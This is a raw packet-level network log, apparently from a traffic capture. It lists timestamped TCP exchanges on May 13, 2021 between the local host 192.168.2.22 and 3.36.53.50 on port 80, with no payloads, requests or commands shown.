May 13, 2021 08:29:33.793068886 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793108940 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793126106 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793144941 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793153048 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793181896 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793181896 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793219090 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793231964 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793255091 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793267012 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793294907 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793313026 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793334007 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793346882 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793395042 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793426037 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793468952 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793492079 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793508053 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793535948 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793546915 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793557882 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793593884 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793596029 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793637037 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793654919 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793673992 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793685913 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793714046 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793725967 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793754101 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793766022 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793792009 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793802023 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793831110 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793840885 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793868065 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793874025 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793910027 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793915987 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793956995 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.793958902 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.793993950 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794018984 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794032097 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794035912 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794069052 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794075966 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794106007 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794121981 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794145107 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794157028 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794183016 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794194937 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794225931 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794228077 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794269085 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794271946 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794305086 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794311047 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794343948 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794348001 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794384003 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794384956 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794420004 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794429064 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794457912 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794461012 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794495106 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794500113 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794536114 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794540882 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794581890 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794584036 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794617891 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794630051 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794655085 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794660091 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794692993 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794702053 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794728994 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.794739008 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.794778109 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.796905994 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.796948910 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.796962023 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.796986103 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.796993017 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797024012 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797029972 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797060966 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797066927 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797102928 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797108889 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797151089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797157049 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797187090 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797192097 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797224045 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797229052 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797261000 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797266006 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797297001 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797302961 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797336102 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797338963 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797372103 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797379017 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797427893 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797439098 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797480106 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797481060 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797518015 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797523022 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797554016 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797563076 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797590971 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797595978 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797626972 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797635078 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797669888 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797673941 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797715902 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797717094 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797751904 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797761917 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797790051 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797794104 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797827005 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797831059 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797862053 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797869921 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797899961 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797904015 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797936916 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.797945976 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797980070 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.797982931 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.798026085 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806217909 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806276083 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806304932 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806320906 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806334019 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806339979 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806343079 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806361914 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806375027 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806392908 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806406021 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806421041 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806431055 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806454897 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806462049 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806487083 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806494951 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806514978 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806529045 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806544065 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806554079 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806572914 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806582928 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806600094 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806613922 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806628942 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806638956 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806655884 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806673050 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806690931 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806694031 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806720972 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806729078 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806747913 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806759119 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806776047 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806787014 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806803942 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806813002 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806830883 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806847095 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806859970 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806868076 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806886911 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806900978 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806921959 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806936026 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806952953 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806962013 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.806979895 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.806993008 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807008028 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807022095 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807035923 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807049990 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807064056 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807073116 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807090998 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807101011 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807118893 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807130098 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807153940 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807158947 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807183981 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807192087 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807212114 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807221889 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807240963 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807250023 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807269096 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807282925 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807296991 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807311058 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807323933 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807337999 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807352066 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807363033 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807389021 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807389975 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807419062 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807426929 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807446957 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807457924 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807475090 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807483912 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807502985 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807518959 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807529926 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807540894 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807557106 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807585001 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807586908 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807598114 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807619095 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807622910 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807650089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807658911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807677031 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807688951 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807704926 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807717085 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807733059 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807744026 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807760000 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807770967 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807787895 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807796955 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807816029 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807828903 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807851076 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807854891 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807881117 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807893038 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807909012 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807920933 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807936907 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807950020 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807965040 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.807979107 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.807991982 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808001995 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808020115 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808032990 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808048010 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808059931 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808082104 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808085918 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808111906 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808120012 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808139086 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808155060 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808167934 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808178902 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808195114 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808207035 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808222055 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808235884 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808248997 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808262110 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808286905 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808310032 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808314085 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808331966 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808341980 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808363914 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808370113 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808382988 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808407068 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808409929 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808439970 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808448076 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808466911 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808479071 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808495998 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808511019 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808523893 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808537960 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808549881 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808559895 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808579922 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808589935 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808607101 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808618069 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808641911 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808650017 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808674097 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808684111 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808701038 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808712006 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808728933 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808739901 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808757067 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808770895 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808784008 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808794975 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808811903 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808820963 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808840036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808854103 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808875084 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808880091 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808904886 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808918953 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808932066 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808944941 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808959961 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808969021 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.808986902 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.808996916 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809015036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809029102 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809042931 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809053898 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809071064 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809079885 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809104919 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809108973 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809135914 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809148073 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809163094 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809178114 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809190989 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809200048 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809217930 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809226990 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809245110 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809258938 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809273005 CEST	80	49167	3.36.53.50	192.168.2.22
